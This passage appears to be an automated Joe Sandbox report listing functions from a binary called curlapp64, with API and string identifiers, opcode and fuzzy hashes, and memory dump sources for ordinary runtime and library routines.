                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno_writemallocstrerror
                                                                                                                                • String ID: internal error: deflate stream corrupt
                                                                                                                                • API String ID: 673104255-3609297558
                                                                                                                                • Opcode ID: b72e94be7e9c6a20d78fdebd562fe1faeb42a5c575c419178ad16cfa9b5108c0
                                                                                                                                • Instruction ID: 4c669eb3882c90008225fabb69c99f0455689544f77bae00f1efcb62224d42a8
                                                                                                                                • Opcode Fuzzy Hash: b72e94be7e9c6a20d78fdebd562fe1faeb42a5c575c419178ad16cfa9b5108c0
                                                                                                                                • Instruction Fuzzy Hash: 42516171A05A5386EB288F29DA5023932A1FB44FE4F108175DF1E57BD4DF38E8A4E740
                                                                                                                                Function 00007FF6CABD7450 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: Negative width.$Number is too big.$Width is not an integer.
                                                                                                                                • API String ID: 3237623162-431172999
                                                                                                                                • Opcode ID: 112e83678d0f62b29817e72276de694e4c1ab3b3ce6967d91586d6c6608d8f30
                                                                                                                                • Instruction ID: c2ea34cd5b622a079e335b0b3ee5942fa0aa3e58ae2cf6a3e054fd107cbcdde2
                                                                                                                                • Opcode Fuzzy Hash: 112e83678d0f62b29817e72276de694e4c1ab3b3ce6967d91586d6c6608d8f30
                                                                                                                                • Instruction Fuzzy Hash: AB317C62D0C5874AF549AF38747A0FC2B90DF6370AF988DB4D3DD8259BED0CA885C242
                                                                                                                                Function 00007FF6CABED510 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 490COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID: f$p$p
                                                                                                                                • API String ID: 3215553584-1995029353
                                                                                                                                • Opcode ID: 503dcef08136149afe9eb2ad72f42d8d7df428959b37cc8a53cf2ffc9b55751f
                                                                                                                                • Instruction ID: 6027f4f9de17ee79c5c4941e1bf2d0fb744f9c3a9eb6423843c7cc1f3690a845
                                                                                                                                • Opcode Fuzzy Hash: 503dcef08136149afe9eb2ad72f42d8d7df428959b37cc8a53cf2ffc9b55751f
                                                                                                                                • Instruction Fuzzy Hash: 3912A465F0C18386FB249E14F0642797791FB82756F8441F5E6C9876C8EFBDE9808B81
                                                                                                                                Function 00007FF6CABFA958 Relevance: 10.8, APIs: 7, Instructions: 293COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: 49917cc059df20039e06e468b0b7f2b4a114a198367806555f205db337605268
                                                                                                                                • Instruction ID: c6381721d1bbb4c95e6987e013a6548978b42c13be8c32f6f9533e156e703863
                                                                                                                                • Opcode Fuzzy Hash: 49917cc059df20039e06e468b0b7f2b4a114a198367806555f205db337605268
                                                                                                                                • Instruction Fuzzy Hash: 82C1072E90C78A52E7545F19B8602BD7765FB82B82F4D41BDEACE83791CE7CE8548340
                                                                                                                                Function 00007FF6CABB5B40 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 210COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: http://
                                                                                                                                • API String ID: 3668304517-1121587658
                                                                                                                                • Opcode ID: f5104746fe4c3a50d441d46e4d7e5d4a0dde735f4061be2f1d002db0f2ca0df5
                                                                                                                                • Instruction ID: a841422e84d1eaaab2c8de260621f0c325747a9dc1ef757a50806a43854800e4
                                                                                                                                • Opcode Fuzzy Hash: f5104746fe4c3a50d441d46e4d7e5d4a0dde735f4061be2f1d002db0f2ca0df5
                                                                                                                                • Instruction Fuzzy Hash: 7881E562F19A8645FB009F75F5A53BC13229B46BE9F004771DEAD97BDADE38E0818340
                                                                                                                                Function 00007FF6CABD0C00 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                • String ID: type_error
                                                                                                                                • API String ID: 1944019136-1406221190
                                                                                                                                • Opcode ID: d3ecc02fc515bb16589edf71671af8ced29e47fef5d79793d8e81eb4667b39ff
                                                                                                                                • Instruction ID: b304221aeb2fcbbae034b3c766cc90d76cb557816669926b0b6852ccd2af5b4a
                                                                                                                                • Opcode Fuzzy Hash: d3ecc02fc515bb16589edf71671af8ced29e47fef5d79793d8e81eb4667b39ff
                                                                                                                                • Instruction Fuzzy Hash: 0F51A562F15B8595EB00DF75E4603AC2361EF4A399F409371EAAD97AD9DF78E190C300
                                                                                                                                Function 00007FF6CABC6140 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                • String ID: out_of_range
                                                                                                                                • API String ID: 1944019136-3053435996
                                                                                                                                • Opcode ID: d45a9210a95c0769663bb0f492dfe5a666055807b24ea175fa2a773b9eb2f959
                                                                                                                                • Instruction ID: 48840ad3e45f4e63000c6e956afd49cbe559f52d346f66191972f623a4ccdd84
                                                                                                                                • Opcode Fuzzy Hash: d45a9210a95c0769663bb0f492dfe5a666055807b24ea175fa2a773b9eb2f959
                                                                                                                                • Instruction Fuzzy Hash: 60519462F19B8294EB00DF75E4607EC2361EF56399F409371EAAC97AD5EF68E190C300
                                                                                                                                Function 00007FF6CABC3750 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                • String ID: other_error
                                                                                                                                • API String ID: 1944019136-896093151
                                                                                                                                • Opcode ID: d682a5106e7eb6480370ff3bdbd1ac13d4b3c1e55569ba47c5f9a6ca762bd19e
                                                                                                                                • Instruction ID: 3d997382cd3123c9d06fb270e0ebc78461e44eb2719faff6e976e3b495261201
                                                                                                                                • Opcode Fuzzy Hash: d682a5106e7eb6480370ff3bdbd1ac13d4b3c1e55569ba47c5f9a6ca762bd19e
                                                                                                                                • Instruction Fuzzy Hash: C951C462F15B8194EB00DF75E4A03AC6361EF46799F409371EAAD93AD9DF6CE190C300
                                                                                                                                Function 00007FF6CABBB1B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 150COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                • String ID: type_error
                                                                                                                                • API String ID: 1944019136-1406221190
                                                                                                                                • Opcode ID: 4284190e7b07bb8297caf99e73992e47110b351269e18d6481b62a1551601da3
                                                                                                                                • Instruction ID: 3965f70e74a126af6ae873bf97f2aab48d024a481e1b4101370d82c8ec461527
                                                                                                                                • Opcode Fuzzy Hash: 4284190e7b07bb8297caf99e73992e47110b351269e18d6481b62a1551601da3
                                                                                                                                • Instruction Fuzzy Hash: 4951B162F19B4198EB00DF75F4A03EC2361EF46395F409371EAAD92AD9EE78E195C300
                                                                                                                                Function 00007FF6CABC8680 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 150COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                • String ID: invalid_iterator
                                                                                                                                • API String ID: 1944019136-2508626007
                                                                                                                                • Opcode ID: 5252c07180c3dbb41a23400cae29d23536e08ea941c2d7d7cad19dedf0638887
                                                                                                                                • Instruction ID: 6c1e77bb8f635260976a53222c06f1b665d02eedb629fe89e553d130cdd6f997
                                                                                                                                • Opcode Fuzzy Hash: 5252c07180c3dbb41a23400cae29d23536e08ea941c2d7d7cad19dedf0638887
                                                                                                                                • Instruction Fuzzy Hash: 8851C562F19B4194EB00DF75E4643ED2361EF46799F005372EBAD92AD6EE38E195C300
                                                                                                                                Function 00007FF8BA246E40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _write$_errnomemsetstrerror
                                                                                                                                • String ID: internal error: deflate stream corrupt
                                                                                                                                • API String ID: 101764657-3609297558
                                                                                                                                • Opcode ID: 0721d50ef3e274cebcdc975a975a7d652a7a70e2e80f9c972380d3921c994e9c
                                                                                                                                • Instruction ID: fdefc06b616e3f1ed0cb376f4fa0034faee1f00675fe0a5c059acffc6f15e2a0
                                                                                                                                • Opcode Fuzzy Hash: 0721d50ef3e274cebcdc975a975a7d652a7a70e2e80f9c972380d3921c994e9c
                                                                                                                                • Instruction Fuzzy Hash: D9518D32A0564386EB189F2AD65023937A1FB84FD8F148675DF5E43B94CF38E8A1D740
                                                                                                                                Function 00007FF6CABBBE30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$GetcollLocinfo::_Locinfo_ctorLockit::_Lockit::~__invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: bad locale name
                                                                                                                                • API String ID: 3908275632-1405518554
                                                                                                                                • Opcode ID: e07bf025eb17b4c263de924eba2429197c001596c59850071b89941cc3c22796
                                                                                                                                • Instruction ID: d70f2b79fd334140a87a3af5589216d57f183ec8254cfc5389eaf26a45e20c1f
                                                                                                                                • Opcode Fuzzy Hash: e07bf025eb17b4c263de924eba2429197c001596c59850071b89941cc3c22796
                                                                                                                                • Instruction Fuzzy Hash: 09514C32B19B418AFB10DFB0F4A06AC3361EF45749F0441B5DE8DA7A99DE38D465D384
                                                                                                                                Function 00007FF6CABDCAE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Invalid fill (too long).$Invalid format string.$invalid fill character '{'
                                                                                                                                • API String ID: 909987262-2189586557
                                                                                                                                • Opcode ID: f559ccee564772a3e08e28e57cc904f5b370a393d2fd08c898030f8cb87c8c2a
                                                                                                                                • Instruction ID: bfc77d5a8568479af6d77f3aeac17977234289bd0254cb6260cea80f834b517c
                                                                                                                                • Opcode Fuzzy Hash: f559ccee564772a3e08e28e57cc904f5b370a393d2fd08c898030f8cb87c8c2a
                                                                                                                                • Instruction Fuzzy Hash: 7041EA21F0C58A86EA249F6AF4201B9A351EF57BC5F988072DBCD87798DE6DF541C340
                                                                                                                                Function 00007FF6CABE92DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6CABE958E,?,?,?,00007FF6CABE9280,?,?,?,00007FF6CABE5E61), ref: 00007FF6CABE9361
                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6CABE958E,?,?,?,00007FF6CABE9280,?,?,?,00007FF6CABE5E61), ref: 00007FF6CABE936F
                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6CABE958E,?,?,?,00007FF6CABE9280,?,?,?,00007FF6CABE5E61), ref: 00007FF6CABE9399
                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6CABE958E,?,?,?,00007FF6CABE9280,?,?,?,00007FF6CABE5E61), ref: 00007FF6CABE9407
                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6CABE958E,?,?,?,00007FF6CABE9280,?,?,?,00007FF6CABE5E61), ref: 00007FF6CABE9413
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                • String ID: api-ms-
                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                • Opcode ID: a782d08a5ee46e8e1779692487f4e335f97326f40c204a8a276b8c1220764adc
                                                                                                                                • Instruction ID: ed3d97896584aefc48022540ac346019551d459699222f33e27155b1d35335f1
                                                                                                                                • Opcode Fuzzy Hash: a782d08a5ee46e8e1779692487f4e335f97326f40c204a8a276b8c1220764adc
                                                                                                                                • Instruction Fuzzy Hash: C6310C31B0AF4291EE11DF92B860678A3A4BF45B66F5905B5DDAD87380EF3CE448C740
                                                                                                                                Function 00007FF8BA246BD0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 72COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF8BA246A21,?,00000000), ref: 00007FF8BA246BEA
                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF8BA246A21), ref: 00007FF8BA246C34
                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BA246C93
                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF8BA246A21), ref: 00007FF8BA246C9D
                                                                                                                                  • Part of subcall function 00007FF8BA245230: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BA24525D
                                                                                                                                  • Part of subcall function 00007FF8BA245230: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BA2452C0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: freemalloc
                                                                                                                                • String ID: 1.3.1$X$out of memory
                                                                                                                                • API String ID: 3061335427-2920223590
                                                                                                                                • Opcode ID: 4930c30deb11aaabf8b17e15af49810dea7ccbc60d3a8d34e3ce465ff62fdd26
                                                                                                                                • Instruction ID: 3869e7a5124f2d4c5172597edf452d34c0e9ab6409ec8388ae5a2fa21ae158cb
                                                                                                                                • Opcode Fuzzy Hash: 4930c30deb11aaabf8b17e15af49810dea7ccbc60d3a8d34e3ce465ff62fdd26
                                                                                                                                • Instruction Fuzzy Hash: 2A312832608B428AE760DF29E44026977A4FB88FA4F144275DF9E47798DF3CE859DB40
                                                                                                                                Function 00007FF6CAC04488 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                • String ID: CONOUT$
                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                • Opcode ID: 6997d0cb888ded036fbdf69dac13bbeb53c113875ad6812d165759a6759693e9
                                                                                                                                • Instruction ID: 82d76ba18ac4be4263b199d43d51154ba6238a19b8f6e4a652e856595d388181
                                                                                                                                • Opcode Fuzzy Hash: 6997d0cb888ded036fbdf69dac13bbeb53c113875ad6812d165759a6759693e9
                                                                                                                                • Instruction Fuzzy Hash: 02115E72B18A8186E7508F96F86432A62B0FB88BE6F044274EF9DC7794DF3CD4548744
                                                                                                                                Function 00007FF6CABE37A8 Relevance: 9.2, APIs: 6, Instructions: 239COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2984826149-0
                                                                                                                                • Opcode ID: a4ae477cd1e76dea8615bdd881bdf2b9848966a3ce02d94f99ccd202125ce3c7
                                                                                                                                • Instruction ID: c4a7a15575572663093959adf588032125dd99f437930ff87528912f9ffdb70e
